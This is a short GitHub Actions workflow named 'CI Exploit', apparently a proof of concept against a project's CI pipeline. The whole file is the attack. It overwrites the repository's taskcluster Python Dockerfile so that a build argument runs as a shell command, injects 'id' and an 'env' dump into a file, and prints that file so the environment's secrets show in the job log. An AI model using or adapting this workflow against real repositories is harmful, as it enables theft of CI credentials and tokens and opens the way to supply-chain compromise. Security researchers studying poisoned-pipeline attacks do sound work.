name: CI Exploit
on: push

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2

      - name: Overwrite Dockerfile
        run: |
          echo 'FROM alpine:latest
ARG INJECT
RUN /bin/sh -c "$INJECT"' > taskcluster/docker/python/Dockerfile

      - name: Inject Code & Build
        run: |
          docker build \
            --build-arg INJECT="echo pwned && id && env > /leak" \
            -t exploit-image ./taskcluster/docker/python

      - name: Print Leaked Secrets
        run: |
          docker run --rm exploit-image cat /leak || echo "Leak failed"
